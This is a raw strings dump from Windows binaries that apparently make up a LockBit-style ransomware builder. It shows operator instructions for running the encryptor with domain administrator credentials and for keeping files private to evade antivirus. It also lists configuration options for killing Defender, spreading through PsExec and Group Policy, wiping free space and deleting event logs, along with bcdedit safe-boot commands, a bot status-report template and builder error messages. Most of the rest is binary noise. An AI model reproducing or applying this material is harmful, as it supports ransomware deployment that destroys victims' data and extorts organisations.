!This program cannot be run in DOS mode.
`.rdata
@.data
X_^ZY[
SQRVW3
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
C hLp@
C!h`p@
C"hpp@
C.h q@
C/h0q@
t`h@q@
u-hTq@
C2hdq@
C3htq@
SQRVW3
_^ZY[]
_^ZY[]
v^@j(j
PPhxr@
PPPPPPh
9D$$ua
L$ 9L$8}>
9|$0r4
T$PWSR
9|$0r4
D$PWSP
D$LEH;
+L$HRQW
+D$H[_]^
<ar <fw
aPLib v1.1.1 - the smaller the better :)
Copyright (c) 1998-2014 Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
MessageBoxW
USER32.dll
CreateFileW
ExitProcess
FindResourceW
GetCommandLineW
GetFileSize
GetModuleHandleW
GlobalFree
LoadResource
LockResource
ReadFile
SizeofResource
WriteFile
KERNEL32.dll
CommandLineToArgvW
SHELL32.dll
_strcmpi
_stricmp
_wcsicmp
memcpy
memset
sprintf
strchr
strcpy
strlen
strstr
wcscat
wcscpy
wcslen
wcsrchr
msvcrt.dll
CheckSumMappedFile
imagehlp.dll
NtClose
RtlAllocateHeap
RtlFreeHeap
RtlImageNtHeader
ntdll.dll
strncmp
strtod
malloc
realloc
tolower
localeconv
config
settings
encrypt_mode
encrypt_filename
impersonation
skip_hidden_folders
language_check
local_disks
network_shares
kill_processes
kill_services
running_one
print_note
set_wallpaper
set_icons
send_report
self_destruct
kill_defender
wipe_freespace
psexec_netspread
gpo_netspread
gpo_ps_update
shutdown_system
delete_eventlogs
delete_gpo_delay
white_folders
white_files
white_extens
white_hosts
kill_processes
kill_services
gate_urls
impers_accounts
.pdata
.itext
.pdata
.rdata
.reloc
.itext
Important information!
When using Safe Mode it is obligatory to write the full path to the file.
It is not recommended to use the root of the system disk to run the file, since on some versions of Windows it is forbidden to run from there.
When using self-spread and impersonation, the files should be run with at least local administrator privileges on any computer on the network with a valid domain administrator login and password for the impersonation.
Don't leak files and passwords to run, this will help bypass anti-viruses for as long as possible.
Safe Mode
Windows
### Global Mode:
rundll32 C:\Users\Administrator\Desktop\LBB_Rundll32_pass.dll,gdll -pass %s
### Safe Mode:
rundll32 C:\Users\Administrator\Desktop\LBB_Rundll32_pass.dll,sdll -pass %s
Important information!
When using Safe Mode it is obligatory to write the full path to the file.
It is not recommended to use the root of the system disk to run the file, since on some versions of Windows it is forbidden to run from there.
When using self-spread and impersonation, the files should be run with at least local administrator privileges on any computer on the network with a valid domain administrator login and password for the impersonation.
Don't leak files and passwords to run, this will help bypass anti-viruses for as long as possible.
Safe Mode
Windows
### Global Mode:
LBB_pass.exe -pass %s
### Safe Mode:
LBB_pass.exe -safe -pass %s
### Target Mode:
LBB_pass.exe -path C:\file -pass %s
LBB_pass.exe -path C:\folder -pass %s
LBB_pass.exe -path C:\ -pass %s
LBB_pass.exe -path \\?\Volume{11111111-2222-3333-4444-555555555555}\ -pass %s
config
white_folders
0@P`p
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
X_^ZY[
SQRVWj
SQRVW3
_^ZY[]
SQRVW3
SQRVW3
_^ZY[]
SQRVWhLr@
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
DialogBoxParamW
EnableWindow
EndDialog
GetDlgItem
KillTimer
LoadIconW
MessageBoxW
SendMessageW
SetDlgItemInt
SetSysColors
SetTimer
SetWindowPos
SetWindowTextW
SystemParametersInfoW
USER32.dll
CloseHandle
CreateFileW
CreateIoCompletionPort
CreateThread
DeleteFileW
ExitProcess
FindClose
FindFirstFileExW
FindNextFileW
FlushConsoleInputBuffer
GetCommandLineW
GetConsoleWindow
GetDriveTypeW
GetExitCodeThread
GetFileAttributesW
GetFileSize
GetFileSizeEx
GetLogicalDriveStringsW
GetModuleHandleW
GetProcAddress
GetQueuedCompletionStatus
GetStdHandle
GlobalFree
HeapSetInformation
InterlockedIncrement
IsBadReadPtr
MoveFileExW
PostQueuedCompletionStatus
ReadFile
ResumeThread
SetConsoleTextAttribute
SetConsoleTitleW
SetEndOfFile
SetFileAttributesW
SetFilePointerEx
SetThreadPriority
WaitForMultipleObjects
WaitForSingleObject
WriteConsoleW
WriteFile
KERNEL32.dll
InitCommonControls
comctl32.dll
CommandLineToArgvW
DragQueryFileW
SHChangeNotify
SHGetSpecialFolderPathW
SHELL32.dll
_getch
_kbhit
_wcsicmp
memcpy
memmove
memset
swprintf
wcscat
wcscpy
wcslen
wcsrchr
msvcrt.dll
ConvertSidToStringSidW
MD5Final
MD5Init
MD5Update
RegCreateKeyExW
RegDeleteKeyW
RegSetValueExW
AdvAPI32.dll
NtClose
NtDuplicateToken
NtOpenProcess
NtOpenProcessToken
NtQueryInformationToken
NtQuerySystemInformation
NtSetInformationProcess
NtSetInformationThread
NtTerminateThread
RtlAdjustPrivilege
RtlAllocateHeap
RtlCreateHeap
RtlDeleteCriticalSection
RtlDestroyHeap
RtlEnterCriticalSection
RtlFreeHeap
RtlInitializeCriticalSection
RtlLeaveCriticalSection
RtlReAllocateHeap
ntdll.dll
PathAppendW
PathFileExistsW
PathFindExtensionW
PathFindFileNameW
PathIsDirectoryEmptyW
PathIsDirectoryW
PathIsNetworkPathW
PathRemoveFileSpecW
SHLWAPI.dll
WNetAddConnection2W
WNetGetUniversalNameW
mpr.dll
RegDeleteKeyExW
ChangeWindowMessageFilter
NtSetThreadExecutionState
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3">
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>True/PM</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
language="*"
processorArchitecture="x86"/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="requireAdministrator"
uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!--The ID below indicates app support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates app support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates app support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates app support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates app support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
</assembly>
72Nw#;KJJN
p!K[9x
J\)GDE
mI?uJF
`Hjjj
m$#AAAT
W2\2s2
6`6B7v7
7 8L9x9
>F?P?o?
1#3-3H3t3
4C4S4\4f4
9#:t:(;d;
<4=E=k=
0 0.0<0B0Q0]0h0u0
1*181>1M1Y1d1q1
4#4J4S4
5,5F5P5Z5d5n5
6#6)646>6D6Q6W6_6e6x6
7$7)7<7F7L7\7f7l7z7
8,8M8V8a8j8
9!999?9Y9
:::T:u:~:
;N;X;b;l;
0$0*00060<0B0H0N0T0Z0`0f0l0r0x0~0
1 1&1,12181>1D1J1P1V1\1b1h1n1t1z1
2"2(2.2
!This program cannot be run in DOS mode.
`.itext
`.rdata
@.data
.reloc
X_^ZY[
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
>!KK
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
t >! K
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
tt>!
pp|B>>q
aaj_55
UUPx((
cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
tttt KKKK
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
WVhta@
WVh4b@
WVh`b@
WVh$c@
WVhTc@
WVhhc@
WVhxc@
G Ph QB
*nt'=l
~/t =8^
SQRVWj
SQRVW3
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
SQRVW3
9D$$ua
L$ 9L$8}>
9|$0r4
T$PWSR
9|$0r4
D$PWSP
D$LEH;
+L$HRQW
+D$H[_]^
.text$mn
.itext
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
BitBlt
CreateDIBitmap
CreateFontW
CreateSolidBrush
GetDeviceCaps
GetPixel
GetTextColor
SelectObject
SelectPalette
SetPixel
gdi32.dll
CreateDialogParamW
CreateWindowExW
DefWindowProcW
GetDlgItem
IsDlgButtonChecked
LoadImageW
LoadMenuW
USER32.dll
FreeLibrary
GetCommandLineA
GetCommandLineW
GetFileAttributesW
GetLastError
GetLocaleInfoW
GetModuleHandleA
GetProcAddress
KERNEL32.dll
wtsapi32.dll
wtsapi32.dll
HURSVWAPAQH
AYAX_^[Z]
HUSVWARH
e0AZ_^[]
HURSVWAPAQH
AYAX_^[Z]
ockBit
RAnsomw
cryp~t
s,0Po^TOR
2yf| 7l
hxejugz4
4l30az
gy6sp3d.
7=e3;4
ojrl5iq
n2hH6>u
j4r>gm
.z?Dtxd
lqgLhQh
#| >=@
PgeYt\!?>
f#Te&I
K)LF4<
deZ)eR$V
'&SOP,
oPHv-ux
-a`Rxh%
qjtlKR
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"stat_all_files":"%u",
"stat_not_encrypted":"%u",
"stat_size":"%s",
"execution_time":"%u",
"start_time":"%u",
"stop_time":"%u"
proggam
cGn Ot
$LDP@ELc
hOl8wn
=qtoH%
Wd0A5j
5-36p
B3V*{K
Wg08Ks
-@FXRl
8TcC?mo
owEdx:
@!4@"d
2DXD@1
M 4DjD
xml ve
clh(2-
<triu0
bcdedit /set {current} safeboot network
bcdedit /deletevalue {current} safeboot
bootcfg /raw /a /safeboot:network /id 1
bootcfg /raw /fastdetect /id 1
proggam
cGn Ot
$LDP@EL8
wz]VbX8
sR.'p$|
relocd
h?z(=<y
,;P2HS
F,)01;@
FX#\>@
B+TLzC
)Y$5$2n
7)3'u+$
%L0v+TH
$S:,"~Drb
DIBigm
l8|kIT
gdi32A'l
Ptrgce
nCheck
IUSEWR
xml ve
<tru0I
)"/eOuf
2O5X!^6
8ritrv|x
;$<0=:>m?
:1;:<[=p>
91$:@;R<d=
99$:*;<<^=r>
? ?$?(?,g
?xml ver
sion="1.t0
utf-8`?>
<NTSJv:ic
:{2CFB4r8:A-
b=5d|70B
s=A0RF[7-3<41
z name
\SQLPB;DM
><Prop
]`ENGI
:Mv$RY
R@play
?xml ver
sion="1.t0
utf-8`?>
<Files c
0BE4$C8
p name
?xml ver
sion="1.t0
utf-8`?>
<Schedul
B{C 63F20
ame\%s
>Typ<5I4tj
2lBHigC
PT10hMh
F3"mh:2
rddDIs
>3A9tg%
tU8#*ye
H:Et28M
<?xml
version=
mp>ts
or|g820
XMLSche
z3prcxm
2YABrP
TabQlY
BYGKm!
?xml ver
sion="1.t0
utf-8`?>
workShua
2087nD
mage^2
><PropAN
al/Rgguj
GES)be
proggam
cGn Ot
$LDP@EL8
.rdat(
relocY
L'jpEL
1RtVB
J@UY"W
b](@|-
~}zHGkS
.1l2Y*
1ds=4=/ $
ZGi67
u|v;D/S
_R8$A
, d0b4
5uIt4^
)a./;\#
$mnt|x.i
(!,$*bsp
DI;Bi<m
USESR}p
?xml ver
sion='1.t0
UTF-8"
nif~tV
InfoNd"
cXitSy
;!<'=0>:?G?M?V?`?m?s?
#>r2t8vGxMzd|m
0>'VGsg
3r6tVvmx
(5I'zG
:2;D<[=i>|?
G7TW^wt
59r\thv
x?XQ~|~
c0aZ1h?
?%U$38O
6:s8&K<s+
r')v p$7X
.qXd0x
Loyn?P00
=;>B>I>P>t>
?`?g?n?u?
0O0V0]0d0
1F1M1T1[1y1
243;3B3I3
3*41484?4y4
4 5&5-545
6U6\6c6j6
; ;);/;A;G;Q;
;@<R<X<b<h<z<
=.=S=`=
4!4&42474C4H4T4Y4e4j4v4{4
8C8_8~8
;";,;6;@;N<
<5=^=h=4>
0/050>0b0h0q0
1!12181B1H1m1s1|1
1f2m2z2
3 4(4Q4g4
5)5H5U5|5
6!6.6Z6
7-7;7L7X7h7
<%=<=N=`=x=
?3?<?F?S?j?
1T2d2{2
3%4=4W4u4
9!9M9]9r9
:f;u;~;
="=+=4=Z=
=&>K>d>
1*1<1T1i1r1
5)525A5X5
556W6v6
849C9R9l9
:):/:8:P:[:f:q:w:}:
=>=D=I=P=\=b=
141=1O1Z1g1p1
2=2s2}2
3'3P3Y3k3v3
4'404M4
:*;T;^;
<3=F=O=`=i=
0-161?1n1
2T2^2t2
3!3*3D3
4C4K4w4
535V5|5
7L7T7Z7s7{7
8%8+888V8b8i8r8y8
: ;/;?;h;{;
<G<`<k<y<
=?=T=b=p=
111F1O1]1k1t1
2+242=2i2{2
3$3i3|3
425C5f5~5
6)6A6c6
7%777f7
:9:K:q:U;
='=5=C=Q=_=
1 121Y1i1
2$282E2N2c2
3L3U3j3
768l8t8
:8:>:D:R:r:x:~:
;&;=;O;a;y;
<!<*<s<
>&>,>y>
:0X0l0
1 1t1y1
2"2'282>2H2M2^2d2i2n2}2
8L8^8D;e;
;J<f<z<
<2=<=h=F>^>
?*?M?u?
0 020N0T0f0x0
0.1<1Z1g1
1!262r2
334?4E4X4_4f4l4|4
4D5N5w5
7&8;8a8
;";5;c;
>#>>>y>
W0a0k0
1,161_1h1
2+262;2M2
4,5D5c5
828A8V8k8z8
9/989G9R9X9]9o9z9
;);4;^;
<9<C<m<
<"=0=;=@=R=
?-?A?k?
0%101]1
414M4k4~4
526:6H6P6s6~6
7A7R7\7l7r7w7
8)9]9n9x9
:R;Z;n;};
<'<0<H<R<j<
>5>d>n>
?#?)?2???E?K?Q?e?l?
6:7]7g7
;\<i<v<
>'>B>[>e>|>
1!1:1K1d1j1p1x1~1
5$5)5A5M5S5n5
5#6;6H6U6\6b6r6
:m: ;A;W;
<@=I=a=k=
233F3i3
4,4?5I5q5
=;>F>g>
1)131D1
3+3W3o364
7*878R8{8
=L>i>y>
>6?G?T?
1b2n2|2
:P:h:u:
<,=<=Q=
?.?3?g?
0 0&0,050@0F0L0R0b0i0o0}0
1$1=1_1
2!2/292H2O2U2i2r2x2
2+3:3H3R3a3h3n3w3
6"6K6^6
747\8b8h8n8t8z8
=$=*=0=6=<=B=
!This program cannot be run in DOS mode.
`.itext
`.rdata
@.data
.reloc
X_^ZY[
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
>!KK
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
t >! K
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
tt>!
pp|B>>q
aaj_55
UUPx((
cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
tttt KKKK
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
e~d[7q
SQRVW3
*4t'=V
SQRVWj
SQRVW3
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
SQRVW3
9D$$ua
L$ 9L$8}>
9|$0r4
T$PWSR
9|$0r4
D$PWSP
D$LEH;
+L$HRQW
+D$H[_]^
encryptor3dll.dll
.text$mn
.itext
.idata$5
.rdata
.edata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
CreateFontW
GetPixel
GetTextColor
SetDCBrushColor
SetPixel
gdi32.dll
DefWindowProcW
DialogBoxParamW
EndDialog
GetClassNameW
GetDlgItemTextW
GetWindowTextW
IsDlgButtonChecked
LoadImageW
LoadMenuW
USER32.dll
FormatMessageW
FreeLibrary
GetCommandLineW
GetFileAttributesW
GetModuleHandleW
GetProcAddress
GetTickCount
LoadLibraryExA
SetLastError
KERNEL32.dll
wtsapi32.dll
wtsapi32.dll
HURSVWAPAQH
AYAX_^[Z]
HUSVWARH
e0AZ_^[]
HURSVWAPAQH
AYAX_^[Z]
proggam
cGn Ot
$LDP@ELc
hOl8wn
=qtoH%
Wd0A5j
5-36p
B3V*{K
Wg08Ks
-@FXRl
8TcC?mo
owEdx:
@!4@"d
2DXD@1
M 4DjD
xml ve
clh(2-
<triu0
ockBit
RAnsomw
cryp~t
s,0Po^TOR
2yf| 7l
hxejugz4
4l30az
gy6sp3d.
7=e3;4
ojrl5iq
n2hH6>u
j4r>gm
.z?Dtxd
lqgLhQh
#| >=@
PgeYt\!?>
f#Te&I
K)LF4<
deZ)eR$V
'&SOP,
oPHv-ux
-a`Rxh%
qjtlKR
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"stat_all_files":"%u",
"stat_not_encrypted":"%u",
"stat_size":"%s",
"execution_time":"%u",
"start_time":"%u",
"stop_time":"%u"
bcdedit /set {current} safeboot network
bcdedit /deletevalue {current} safeboot
bootcfg /raw /a /safeboot:network /id 1
bootcfg /raw /fastdetect /id 1
proggam
cGn Ot
$LDP@EL8
wz]VbX8
sR.'p$|
relocd
h?z(=<y
,;P2HS
F,)01;@
FX#\>@
B+TLzC
)Y$5$2n
7)3'u+$
%L0v+TH
$S:,"~Drb
DIBigm
l8|kIT
gdi32A'l
Ptrgce
nCheck
IUSEWR
xml ve
<tru0I
)"/eOuf
2O5X!^6
8ritrv|x
;$<0=:>m?
:1;:<[=p>
91$:@;R<d=
99$:*;<<^=r>
? ?$?(?,g
?xml ver
sion="1.t0
utf-8`?>
<NTSJv:ic
:{2CFB4r8:A-
b=5d|70B
s=A0RF[7-3<41
z name
\SQLPB;DM
><Prop
]`ENGI
:Mv$RY
R@play
?xml ver
sion="1.t0
utf-8`?>
<Files c
0BE4$C8
p name
?xml ver
sion="1.t0
utf-8`?>
<Schedul
B{C 63F20
ame\%s
>Typ<5I4tj
2lBHigC
PT10hMh
F3"mh:2
rddDIs
>3A9tg%
tU8#*ye
H:Et28M
<?xml
version=
mp>ts
or|g820
XMLSche
z3prcxm
2YABrP
TabQlY
BYGKm!
?xml ver
sion="1.t0
utf-8`?>
workShua
2087nD
mage^2
><PropAN
al/Rgguj
GES)be
proggam
cGn Ot
$LDP@EL8
.rdat(
relocY
L'jpEL
1RtVB
J@UY"W
b](@|-
~}zHGkS
.1l2Y*
1ds=4=/ $
ZGi67
u|v;D/S
_R8$A
, d0b4
5uIt4^
)a./;\#
$mnt|x.i
(!,$*bsp
DI;Bi<m
USESR}p
?xml ver
sion='1.t0
UTF-8"
nif~tV
InfoNd"
cXitSy
;!<'=0>:?G?M?V?`?m?s?
#>r2t8vGxMzd|m
0>'VGsg
3r6tVvmx
(5I'zG
:2;D<[=i>|?
G7TW^wt
59r\thv
x?XQ~|~
c0aZ1h?
?%U$38O
6:s8&K<s+
r')v p$7X
.qXd0x
Loyn?P00
>o>v>}>
?$?+?O?
11181?1F1z1
2)20272>2j2
3 3'3.3h3o3v3}3
4%4^4e4l4s4
5S5Z5a5h5
5!6(6/666
:;;M;S;];c;u;{;
; <0<t<
&4+474<4H4M4Y4^4j4o4{4
5%5*565;5G5L5X5]5
="=4=[=
090?0H0l0r0{0
181>1G1k1q1z1
2/262>2D2P2[2
4.4J4Y4
5"6A6b6u6
757d7r7
>%>L>U>b>y>
>U?d?m?
60C0S0]0
464O4[4
4J5c5t5
6-6E6V6a6k6
9+9V9e9t9
:e;t;};
;2<K<a<p<z<
1 2,2_2
838K8_8h8|8
:S:=;S;
<&<D<X<b<h<r<|<
= =C=I=
>7><>B>K>Q>W>a>u>
?)?>?X?e?o?v?
B0P0a0
2)2;2X2g2v2
2&303Y3b3y3
404;4H4Q4y4
5<5^5h5
6<6E6W6b6o6x6
7!7,797B7g7
9"919l9
;/;=;K;Y;k;|;
>(>1>d>
F0^0x0
1<2I2g2
3*3P3Y3s3
4)4J4U4g4
5,5;5D5W5o5|5
738L8i8
9&9H9X9b9
;!;5;I;[;
1<1G1[1j1~1
2:2C2U2l2{2
7*7<7a7s7
9;9L9W9
6(666k6
='=5=C=h=
=,>b>j>
30363@3]3
3+4D4^4
4.595X5^5t5z5
6 626?6E6g6m6x6
7,8[8s8
1:1@1_1
3L4c4~4
6&6J6V6q6
7K8W8]8p8w8~8
9&:5:m:w:
;><S<y<
>0?:?M?{?
222;2V2
3$3)3;3
5 5D5N5w5
556C6N6S6e6
6N7X7b7
8(8<8E8P8
:':1:;:I:S:e:p:v:{:
:1;S;r;
0#161f1y1
282V2r2
3.3B3z3
5[536B6K6
7"7,7W7
:(:2:J:
<D<N<b<x<
=#=,=9=?=E=K=_=f=
>2>b>u>
&0D0Y0i0|0
6N6a6{6
6%757J7d7q7{7
8$8;8I8Z8
93999?9V9t9
:!:5:H:Q:h:z:
>>>\>v>
?4?A?N?U?[?k?
5<6E6]6g6
;/<B<e<
<(=;>E>m>
677B7c7}7
: :+:5:;:L:
;%<3<_<w<>=
1>2Y2u2
9":0:>:
2'3>3a3
6G7Y7g7x7
9)939<9M9V9a9g9m9s9
:$:.:7:E:S:]:f:o:
;$;2;;;A;O;Y;h;o;w;
<$<5<=<E<T<
4$4*40464<4B4H4N4T4Z4
5(5>5X5n5
6 6*6>6P6f6z6
!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
X_^ZY[
=j&&LZ66lA??~
}{))R>
f""D~**T
V22dN::t
o%%Jr..\$
&&Lj66lZ??~A
99rKJJ
==zGdd
""Df**T~
;22dV::tN
$$Hl\\
C77nYmm
%%Jo..\r
>!KK
55j_WW
&Lj&6lZ6?~A?
~=zG=d
"Df"*T~*
2dV2:tN:
x%Jo%.\r.
t >! K
a5j_5W
ggV}++
Lj&&lZ66~A??
bS11*?
Xt,,4.
RRvM;;
MMfU33
PPxD<<%
Bc!! 0
~~zG==
Df""T~**;
dV22tN::
xxJo%%\r..8$
tt>!
pp|B>>q
aaj_55
UUPx((
cccc||||wwww{{{{
kkkkoooo
gggg++++
YYYYGGGG
&&&&6666????
nnnnZZZZ
RRRR;;;;
[[[[jjjj
9999JJJJLLLLXXXX
CCCCMMMM3333
PPPP<<<<
~~~~====dddd]]]]
ssss````
""""****
2222::::
$$$$\\\\
7777mmmm
llllVVVV
eeeezzzz
xxxx%%%%....
tttt KKKK
pppp>>>>
ffffHHHH
aaaa5555WWWW
UUUU((((
BBBBhhhhAAAA
='9-6d
_jbF~T
11#?*0
,4$8_@
t\lHBW
QPeA~S
>4$8,@
p\lHtW
+HpXhE
T[$:.6
00006666
CCCCDDDD
TTTT{{{{
####====
ffff((((
vvvv[[[[
IIIImmmm
%%%%rrrr
]]]]eeee
llllppppHHHHPPPP
FFFFWWWW
kkkk::::
AAAAOOOOgggg
tttt""""
nnnnGGGG
VVVV>>>>KKKK
yyyy
YYYY''''
____````QQQQ
;;;;MMMM
ccccUUUU!!!!
euo[7z
SQRVW3
*?t'=]
SQRVWj
SQRVW3
_^ZY[]
_^ZY[]
_^ZY[]
_^ZY[]
SQRVW3
9D$$ua
L$ 9L$8}>
9|$0r4
T$PWSR
9|$0r4
D$PWSP
D$LEH;
+L$HRQW
+D$H[_]^
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
CreateFontW
CreateSolidBrush
GetDeviceCaps
GetPixel
SetDCBrushColor
SetTextColor
TextOutW
gdi32.dll
CreateMenu
CreateWindowExW
DefWindowProcW
DialogBoxParamW
GetMessageW
IsDlgButtonChecked
LoadImageW
USER32.dll
FreeLibrary
GetAtomNameW
GetFileAttributesW
GetLastError
GetLocaleInfoW
GetModuleHandleA
GetModuleHandleW
GetProcAddress
GetTickCount
SetLastError
KERNEL32.dll
wtsapi32.dll
wtsapi32.dll
HURSVWAPAQH
AYAX_^[Z]
HUSVWARH
e0AZ_^[]
HURSVWAPAQH
AYAX_^[Z]
ockBit
RAnsomw
cryp~t
s,0Po^TOR
2yf| 7l
hxejugz4
4l30az
gy6sp3d.
7=e3;4
ojrl5iq
n2hH6>u
j4r>gm
.z?Dtxd
lqgLhQh
#| >=@
PgeYt\!?>
f#Te&I
K)LF4<
deZ)eR$V
'&SOP,
oPHv-ux
-a`Rxh%
qjtlKR
proggam
cGn Ot
$LDP@ELc
hOl8wn
=qtoH%
Wd0A5j
5-36p
B3V*{K
Wg08Ks
-@FXRl
8TcC?mo
owEdx:
@!4@"d
2DXD@1
M 4DjD
xml ve
clh(2-
<triu0
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"bot_version":"%s",
"bot_id":"%s",
"bot_company":"%.8x%.8x%.8x%.8x%",
"stat_all_files":"%u",
"stat_not_encrypted":"%u",
"stat_size":"%s",
"execution_time":"%u",
"start_time":"%u",
"stop_time":"%u"
c0aZ1h?
?%U$38O
6:s8&K<s+
r')v p$7X
.qXd0x
Loyn?P00
>:?A?H?O?s?
0!0&0t0
0"1)10171U1\1c1j1
2!2(2/2M2T2[2b2
3=3D3K3R3
344;4B4I4
4 5'5.555w5~5
5E6L6S6Z6
;_;q;w;
4 4+404<4A4M4R4^4c4o4t4
7 8;8W8v8
>S?Y?l?r?
0B0H0Q0u0{0
1"1(1M1S1\1g1v1|1
2'3>3W3n3
6;6Z6u6
=(===F=e=
'0I0V0
2'2>2W2k2
3G3a3z3
4 595X5p5
656G6[6
8#888G8V8
8+9>9L9
= =:=I=
> ?9?m?
0!0*090H0
4<4_4w4
7,8R8p8
9,92989B9
:7:<:B:K:Q:W:a:u:
;=;F;];h;u;~;
< <,<5<]<
= =B=L=u=~=
= >)>;>F>S>\>y>
3!3/3=3O3`3
7*8B8\8p8}8
9 :-:K:
;4;=;W;
<:<]<~<
< =*=@=N=`=o=x=
?/?R?x?
131E1Z1
3<3G3[3j3~3
4:4C4U4l4{4
9*9<9a9s9
;;;L;W;
< <P<`<j<
>)>=>Q>c>
:#:_:;;H;X;b;
>->R>d>r>
0.0N0]0l0#2j2
40585T5c5q5
767<7B7l7
8%8=8R8[8q8
879J9i9
:=;l;r;|;
=0=j=u=
=8>=>C>Q>[>n>{>
?"?(?-?2?A?V?
8)8E8\8
9*9>9v9|9
;";v;|;
=*=<=C=I=N=T=
>+>M>b>
6H7R7e7
: :H:Q:l:
:!;/;:;?;Q;
=)=8=\=f=
>M>[>f>k>}>
?f?p?z?
0$0.0@0T0]0h0
1(2?2I2S2a2k2}2
3"383i3
4&4/4=4G4[4d4o4y4
5?5E5Y5b5o5
6"606:6I6P6V6_6h6y6
6M7a7x7$:
D?J?P?V?\?b?h?n?t?z?
Config File Error
[ERROR]
Public Key File Error
[ERROR]
Public Key File Size Error
[ERROR]
Error Allocate KeyHexBuf
[ERROR]
Error Allocate KeyAndConfBuf
[ERROR]
Error Allocate WorkMem
[ERROR]
Resource Compression Error [BuildDll]
[ERROR]
Resource Not Found [BuildDll]
[ERROR]
Error Allocate ExeBuf
[ERROR]
Encryptor Creation Error [BuildDll #1]
